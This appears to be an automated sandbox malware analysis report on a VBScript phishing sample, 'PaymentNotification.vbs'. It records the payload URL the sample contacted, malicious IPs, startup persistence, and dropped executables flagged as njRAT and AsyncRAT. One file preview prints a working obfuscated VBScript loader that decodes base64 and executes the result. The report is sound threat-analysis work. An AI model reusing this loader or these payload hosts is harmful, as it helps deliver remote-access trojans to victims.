http://www.fontbureau.comd	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.comdi	tmpFB21.tmp.exe, 0000000D.00000003.497966450.0000000005AA4000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt	wscript.exe, 00000000.00000003.340835595.000001B863D52000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.369127141.000001B865B94000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.361151297.000001B863DE7000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373459438.000001B865C70000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.339839120.000001B8665BF000.00000004.00000001.sdmp, wscript.exe, 00000000.00000003.368780987.000001B865B73000.00000004.00000001.sdmp, wscript.exe, 00000000.00000002.373627611.000001B865F9B000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers/cabarga.htmlN	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.monotype.	tmpFB21.tmp.exe, 0000000D.00000003.500377718.0000000005ADD000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.g	wscript.exe, 00000000.00000003.340516433.000001B8665AF000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	tmpFB21.tmp.exe, 0000000D.00000003.495838585.0000000005AAB000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://crl.godaddy.com/gdroot.crl0F	wscript.exe, 00000000.00000003.342698689.000001B8665BF000.00000004.00000001.sdmp	false		high
https://ia601504.us.archive.org/	wscript.exe, 00000000.00000003.339775838.000001B866587000.00000004.00000001.sdmp	false		high
http://www.fontbureau.com/designers8	tmpFB21.tmp.exe, 0000000D.00000002.613796839.0000000005CC0000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/uild	tmpFB21.tmp.exe, 0000000D.00000003.496110456.0000000005AA5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.16.154.36	whatismyipaddress.com	United States	13335	CLOUDFLARENETUS	false
103.6.196.196	neesoontat.com.my	Malaysia	46015	EXABYTES-AS-APExaBytesNetworkSdnBhdMY	true
207.241.227.114	ia601504.us.archive.org	United States	7941	INTERNET-ARCHIVEUS	false
185.140.53.71	unknown	Sweden	209623	DAVID_CRAIGGG	true

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	399489
Start date:	28.04.2021
Start time:	20:48:42
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 15m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	PaymentNotification.vbs
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.phis.troj.adwa.spyw.evad.winVBS@22/17@5/5
EGA Information:	Failed
HDC Information:	Successful, ratio: 11.4% (good quality ratio 10.8%) Quality average: 79.8% Quality standard deviation: 27.8%
HCA Information:	Successful, ratio: 99% Number of executed functions: 330 Number of non-executed functions: 64
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .vbs
Warnings:	Show All Excluded IPs from analysis (whitelisted): 168.61.161.212, 40.88.32.150, 2.23.155.226, 2.23.155.211, 2.23.155.234, 2.23.155.192, 2.23.155.187, 2.23.155.194, 2.23.155.201, 2.23.155.185, 2.23.155.209, 2.20.142.210, 2.20.142.209, 67.26.139.254, 8.238.36.254, 8.248.149.254, 67.27.233.254, 67.26.137.254, 23.57.80.111 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, fs.microsoft.com, 2-01-3cf7-0009.cdx.cedexis.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, download.windowsupdate.com, a767.dscg3.akamai.net, a767.dspw65.akamai.net, wu-fg-shim.trafficmanager.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, download.windowsupdate.com.edgesuite.net, skypedataprdcoleus15.cloudapp.net, blobcollector.events.data.trafficmanager.net, audownload.windowsupdate.nsatc.net, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net Report creation exceeded maximum time and may have missing disassembly code information. Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtCreateFile calls found. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
20:49:54	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
20:50:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe
20:50:30	API Interceptor	2x Sleep call for process: tmp87E4.tmp.exe modified
20:50:55	API Interceptor	75x Sleep call for process: tmpFB21.tmp.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.16.154.36	YpyXT7Tnik.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Payment Advice GLV225445686.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	nzGUqSK11D.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	B6LNCKjOGt5EmFQ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	BANK-STATMENT _xlsx.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	INQUIRY.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	c9o0CtTIYT.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	6JLHKYvboo.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	khJdbt0clZ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	ZMOKwXqVHO.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	5Av43Q5IXd.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	8oaZfXDstn.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	9vdouqRTh3.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	M9RhKQ1G91.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	0CyK3Y7XBs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	pwYhlZGMa6.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	Vll6ZcOkEQ.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	oLHQIQAI3N.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	YrHUxpftPs.exe	Get hash	malicious	Browse	whatismyipaddress.com/
	WuGzF7ZJ7P.exe	Get hash	malicious	Browse	whatismyipaddress.com/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
whatismyipaddress.com	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	HID Purchase LedgerAdvice - 2001330.jar	Get hash	malicious	Browse	66.171.248.178
	X5zr4r9Dbf.jar	Get hash	malicious	Browse	66.171.248.178
	4IttFJZwMj.jar	Get hash	malicious	Browse	66.171.248.178
	C8XAVCtsW4.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	u2qcULTj3T.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	2NijKfXlSp.jar	Get hash	malicious	Browse	66.171.248.178
	Gzw4s0btmW.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	RemittanceAdvice271-20210410-19143_212-50-20210410-203126128.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178
	Cg8OqFNi9n.jar	Get hash	malicious	Browse	66.171.248.178
	UJu0Qiol0P.jar	Get hash	malicious	Browse	66.171.248.178
	UJu0Qiol0P.jar	Get hash	malicious	Browse	66.171.248.178
	B5nWfQK0n6.jar	Get hash	malicious	Browse	66.171.248.178
	2dyOkBlRGM.jar	Get hash	malicious	Browse	66.171.248.178
	czXGMilScJ.jar	Get hash	malicious	Browse	66.171.248.178
	B5nWfQK0n6.jar	Get hash	malicious	Browse	66.171.248.178

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
EXABYTES-AS-APExaBytesNetworkSdnBhdMY	PUR-21601146 SOP-21001146_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	SOA.exe	Get hash	malicious	Browse	103.6.198.37
	PUR-21601146 SOP-21001146_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	PUMP RFQ.exe	Get hash	malicious	Browse	103.6.198.237
	#10020213.exe	Get hash	malicious	Browse	103.6.198.237
	Enquiry 042021 Golden M_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	confirm below invoice.exe	Get hash	malicious	Browse	103.6.198.37
	Enquiry 042021 Emine INCE_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	#10001210.exe	Get hash	malicious	Browse	103.6.198.237
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	TRANSACTION_INTTRANSFER_1617266945242_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	RQF 100021790.exe	Get hash	malicious	Browse	103.6.198.237
	IK8QsX6z2B1lPY0.exe	Get hash	malicious	Browse	137.59.110.57
	efaxHanglung_302.htm	Get hash	malicious	Browse	103.6.198.35
	RFQ - HASTALLOY MATERIAL.exe	Get hash	malicious	Browse	103.6.198.237
	#1002021.exe	Get hash	malicious	Browse	103.6.198.237
	PO AA21C04U3101-MTXGA6_PDF.exe	Get hash	malicious	Browse	137.59.110.57
	#100028153.exe	Get hash	malicious	Browse	103.6.198.237
	#ENQ67548820.exe	Get hash	malicious	Browse	103.6.198.237
CLOUDFLARENETUS	Mga2NdfMyb.exe	Get hash	malicious	Browse	104.17.63.50
	EtnlEBRJwT.exe	Get hash	malicious	Browse	104.17.63.50
	T4QllcPRsl.exe	Get hash	malicious	Browse	104.21.6.252
	Telex_Copy.html	Get hash	malicious	Browse	104.16.18.94
	b304a312_by_Libranalysis.exe	Get hash	malicious	Browse	104.26.12.31
	Ha11NppGrb.exe	Get hash	malicious	Browse	104.21.85.176
	Wh00Ny9HXk.exe	Get hash	malicious	Browse	172.67.188.154
	ZRpmP5qEC1.exe	Get hash	malicious	Browse	172.67.188.154
	NIxm9vbD6u.exe	Get hash	malicious	Browse	104.17.62.50
	Setup.exe	Get hash	malicious	Browse	104.23.98.190
	4G842SDA.exe	Get hash	malicious	Browse	172.67.188.154
	Bestellen.exe	Get hash	malicious	Browse	172.67.208.174
	PR#270473.exe	Get hash	malicious	Browse	104.16.13.194
	VM_04_28_22.HTM	Get hash	malicious	Browse	104.18.11.207
	SkKcQaHEB8.exe	Get hash	malicious	Browse	162.159.130.233
	Halkbank_Ekstre_20210426_080203_744632.pdf.exe	Get hash	malicious	Browse	172.67.188.154
	Aeon Viet Nam Co.,Ltd.doc	Get hash	malicious	Browse	172.67.188.154
	shipment # 46-2021.jpg.exe	Get hash	malicious	Browse	172.67.200.16
	Bank Remittance Copy0572001. PDF.exe	Get hash	malicious	Browse	172.67.188.154
	RFQ for MR 29483 for Affordable Villa.doc	Get hash	malicious	Browse	104.21.19.200

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	diagram-1145261761.xlsm	Get hash	malicious	Browse	207.241.227.114
	Mga2NdfMyb.exe	Get hash	malicious	Browse	207.241.227.114
	EtnlEBRJwT.exe	Get hash	malicious	Browse	207.241.227.114
	diagram-397813623.xlsm	Get hash	malicious	Browse	207.241.227.114
	Telex_Copy.html	Get hash	malicious	Browse	207.241.227.114
	diagram-1304161436.xlsm	Get hash	malicious	Browse	207.241.227.114
	diagram-427473723.xlsm	Get hash	malicious	Browse	207.241.227.114
	wendy.klawon@coldwellbanker.com.htm	Get hash	malicious	Browse	207.241.227.114
	NIxm9vbD6u.exe	Get hash	malicious	Browse	207.241.227.114
	diagram-975956356.xlsm	Get hash	malicious	Browse	207.241.227.114
	statistic-2115301159.xlsm	Get hash	malicious	Browse	207.241.227.114
	statistic-2009856670.xlsm	Get hash	malicious	Browse	207.241.227.114
	payload.exe	Get hash	malicious	Browse	207.241.227.114
	statistic-1693833818.xlsm	Get hash	malicious	Browse	207.241.227.114
	Enrollment_Benefits-2022.docx	Get hash	malicious	Browse	207.241.227.114
	.htm	Get hash	malicious	Browse	207.241.227.114
	#Ud83d#Udcde Maerskdrilling.com AudioMessage_10-86588.htm	Get hash	malicious	Browse	207.241.227.114
	P20200107.DOC	Get hash	malicious	Browse	207.241.227.114
	sean.adair@redwirespace.com1__redwirespace.com.htm	Get hash	malicious	Browse	207.241.227.114
	statistic-1014587430.xlsm	Get hash	malicious	Browse	207.241.227.114

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\79c06ef4ef423d882819c4e66285ec85.exe	12_pgr.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\pgr.exe	12_pgr.exe	Get hash	malicious	Browse
C:\Users\user\AppData\Local\Temp\Tmp.exe	11_tmp.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 Download File
Process:	C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe
File Type:	data
Category:	modified
Size (bytes):	326
Entropy (8bit):	3.1146655678160102
Encrypted:	false
SSDEEP:	6:kKJkElMwTJ0N+SkQlPlEGYRMY9z+4KlDA3RUe0ht:BkElMwTJrkPlE99SNxAhUe0ht
MD5:	2385F10651B284807BD523A237CC041B
SHA1:	3713F39B2654862821D05824635F768679E55A1E
SHA-256:	17AAB987AABBEE866449DB169387D68BEF9976D9EC34A9F0300832A3FA71DFA5
SHA-512:	F4991D8A9DE584EE4B1E7461499306524DDD814737D728E5C04A86C21A0867490C4E8B312D072BD35928138055380D4FFDDD9428B5C8CDEBB8C357F83EE5EEEC
Malicious:	false
Preview:	p...... ........ .I.<..(....................................................... ...................$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.d.8.f.4.f.3.f.6.f.d.7.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\Tmp.exe.log Download File
Process:	C:\Users\user\AppData\Local\Temp\Tmp.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	525
Entropy (8bit):	5.278948378331044
Encrypted:	false
SSDEEP:	12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk7v:MLfaYgi6pB4QF
MD5:	D9626CB08EED6533EC63687FCD734977
SHA1:	E5FEB91EF568D36AD382D9566E2491DB1C90752E
SHA-256:	C86F4B0BA418353A162E3EA9872BB66F0CF453710CBA93D8E3F27234E8B284F3
SHA-512:	AAA37940B006C31398F5526957C3CFF9AAA3E72ED6B8326CA20AC2F523954CD8DCB03F5125A3B7DA1C060DE77D79CBEADD86A5483ED027508C4B177A0BB5D8AB
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\CLR_v2.0\UsageLogs\d4c6a6df7bab3dad31763de990c4ed82.exe.log Download File
Process:	C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d4c6a6df7bab3dad31763de990c4ed82.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	641
Entropy (8bit):	5.279076743766229
Encrypted:	false
SSDEEP:	12:Q3LaJcP0kaHYGLi1B0/9UkB9t01kKVdisk70z6+xaiv:MLfaYgi6pB4Q+r
MD5:	16AC5AEE0452F1A942D29BEDB3E8DE11
SHA1:	3D92E71A2595E14ED8899335B2DE9323BAA85A67
SHA-256:	76F1FC9BA058F4F094A01D5F345B434070B7E35C9CFD4C20617FD9E6EC230CCE
SHA-512:	B1BBBFD16407DC63721EA2F763F4143DF3D0C11698AC0A1BC787502B38AF5A026575D913990CA50B67340F6CB4322E22AC907632457AC43A3C1C42CF2E1DDAA2
Malicious:	false
Preview:	1,"fusion","GAC",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System\1201f26cb986c93f55044bb4fa22b294\System.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Drawing\b12bbcf27f41d96fe44360ae0b566f9b\System.Drawing.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\Microsoft.VisualBas#\76002c3c0a2b9f0c8687ad35e8d9d309\Microsoft.VisualBasic.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Windows.Forms\454c09ea87bde1d5f545d60232083b79\System.Windows.Forms.ni.dll",0..3,"C:\Windows\assembly\NativeImages_v2.0.50727_64\System.Xml\e681e359556f0991834c31646ebd5526\System.Xml.ni.dll",0..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9QTQHWWN\codigo[1].txt Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with CRLF line terminators
Category:	downloaded
Size (bytes):	730
Entropy (8bit):	5.326599429048621
Encrypted:	false
SSDEEP:	12:qzgg3Zl1jnjXuxdDLBtO23FbvsHbtQn2cGbl9ZDu9eFYCvgUnt9YE:qzgg35jnjMe21rwO2zFu9bClwE
MD5:	7D6452CD01754786FF61188733C7E4D4
SHA1:	893DDBA0E2B3E478750E349DB75BFCAB10D71361
SHA-256:	C79CA848CAAFD9525FA6505C1EC7C6AE2AAF3ABAD4DCF73FC988DD769511B58A
SHA-512:	E446959A9A4C66F7F4182ADEBBAAA79D2EA5D57D36608142404632C8B123715DD263820A6D749020DADE425C600608336BA92CC7D5C8C012542E645C0325E046
Malicious:	false
IE Cache URL:	https://ia601504.us.archive.org/25/items/codigo_202104/codigo.txt
Preview:	dim ARrN ..ARrN= (" +++++ ")....dim WOUP ..WOUP= (" /456/").... UnSN = replace(UnSN, (ARrN), "A" ).. UnSN = replace(UnSN, (WOUP), "m" )....UnSN = StrReverse(UnSN) ..UnSN = OyDP(UnSN) ....Function OyDP(WJOv)....dim GUHT,UKsz..Set GUHT = CreateObject("Msxml2.DOMDocument.3.0")..Set UKsz = GUHT.CreateElement("base64")..UKsz.dataType = ("bin.base64") ..UKsz.text = WJOv ..OyDP = HLWn(UKsz.nodeTypedValue)..Set UKsz = Nothing ..Set GUHT = Nothing ..End Function....Function HLWn(PNYC)....dim JuBs ..Set JuBs = CreateObject("ADODB.Stream") ..JuBs.Type = 1 ..JuBs.Open ..JuBs.Write (PNYC) ..JuBs.Position = 0 ..JuBs.Type = 2 ..JuBs.CharSet = ("UTF-8") ..HLWn = JuBs.ReadText ..Set JuBs = Nothing ..End Function....execute UnSN

C:\Users\user\AppData\Local\Temp\Tmp.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	5.550691485739008
Encrypted:	false
SSDEEP:	768:Xq47KHbq7NIowMZVHC8kUYUsFWn4UVm7JsWYKcOvt9t9cFKpBBDZ0DauldK:Ubq7JrDCR3UP4UVkRYw/tekpBBWdK
MD5:	9B30598F8F05C46F8ABB22A4C2ABCC9E
SHA1:	73665A73C48C889AF51EC9C99D8432218676B0CD
SHA-256:	2E5075A95C5663256555E292409149B4522F76FBE63BB48665213006C2D5CA2A
SHA-512:	35B2D08550387CAFED531B6EE3BA81CF1567E0E6934263044896060E39C6A865A8176A9817E259DD0527FC021E2DC9C9845649125EDF5CBFF1FB198AF3175360
Malicious:	true
Yara Hits:	Rule: MAL_Winnti_Sample_May18_1, Description: Detects malware sample from Burning Umbrella report - Generic Winnti Rule, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\Tmp.exe, Author: Brian Wallace @botnet_hunter
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 78%, Browse Antivirus: ReversingLabs, Detection: 83%
Joe Sandbox View:	Filename: 11_tmp.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...N..`............................N&... ........@.. ....................................@..................................%..W....@.......................`....................................................... ............... ..H............text...T.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................0&......H...........i......Y...$...............................................&.(..........(........s.........s.........s.........s.........s..............0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+...0...........~....o.....+..*.0.................,.........o....-..+.......9....~..............,3~.........(....o........,.r...p......(....s....z.+..s..........~.........(.....o......(...+..}.ru....%-.&.+.%.(.....o....

C:\Users\user\AppData\Local\Temp\holderwb.txt Download File
Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\AppData\Local\Temp\pgr.exe Download File
Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	24064
Entropy (8bit):	5.525319833157279
Encrypted:	false
SSDEEP:	384:o8aZYC9twBNdcvFaly2H0dbJo6HghcASEJqc/ZmRvR6JZlbw8hqIusZzZU4:uY+sNKqNHnSdRpcnuq
MD5:	A08F2FAC257ABBBDDDBBD4439F32CFD0
SHA1:	26D3ED4771B701A82F6AA32B747E27BB26E9864C
SHA-256:	BFD5D84C4FED8F9D23F94FE32BB7EE415DBE632C2EBAAC642DBFDB73F89D0833
SHA-512:	3BEAD648A1AD82BD4E5599A55AE573B4CE6DC24EBDC3F0DAEC2C0A327CA1BF5E45A254E4F2480CEE0FEC0A4F83B15863679A63F7DCC0CE37D8F50E644BEFEF40
Malicious:	true
Yara Hits:	Rule: CN_disclosed_20180208_c, Description: Detects malware from disclosed CN malware set, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Florian Roth Rule: JoeSecurity_Njrat, Description: Yara detected Njrat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Joe Security Rule: njrat1, Description: Identify njRat, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: Brian Wallace @botnet_hunter Rule: Njrat, Description: detect njRAT in memory, Source: C:\Users\user\AppData\Local\Temp\pgr.exe, Author: JPCERT/CC Incident Response Group
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 91%, Browse Antivirus: ReversingLabs, Detection: 91%
Joe Sandbox View:	Filename: 12_pgr.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...=..`.................V...........t... ........@.. ....................................@.................................4t..W.......@............................................................................ ............... ..H............text....T... ...V.................. ..`.rsrc...@............X..............@..@.reloc...............\..............@..B................pt......H.......,K...)....../....................................................0..........r...p.....r...p...........r%..p.....r;..p.....rE..p.....r...p.....r...p.....r...p.....r...p(.........r...p(.........r...p(.........r...p(.........(....o....s.........s.....................r...p...........s......... ..............r+..p..............0..;.......~....o....o....r-..p~....(.....o.....o......%(.....(...............,,.......0..D.......~....o....o....r-..p~....(....o......(....o.....

C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe Download File
Process:	C:\Users\user\AppData\Local\Temp\pgr.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	48640
Entropy (8bit):	5.556493970256603
Encrypted:	false
SSDEEP:	768:yuwCfTg46YbWUn8jjmo2qr/Is2z9lvPIHxFxpBpRNr0bHwYcrhgaxRA79sPsXbrn:yuwCfTgp/2xKHb/gbHwYcFgt799XbrLL
MD5:	6107D33B54A998C142311E55B3EC53D2
SHA1:	1C0B31C186FD413DC74E736A8BDEFBF4D0725EEC
SHA-256:	01A31C21F7C70363B4A5CA56BECD789D96646A1F0FD5F755E77EB8E26AE95D6A
SHA-512:	2487F434B5100541081D6B9259E617B646FE67220215D983A469E029AC87630A5492C003A642767F340C6E4580CDC203A91F153CA688BD6EAC1514EEBE0FEE75
Malicious:	true
Yara Hits:	Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: C:\Users\user\AppData\Local\Temp\tmp87E4.tmp.exe, Author: Joe Security
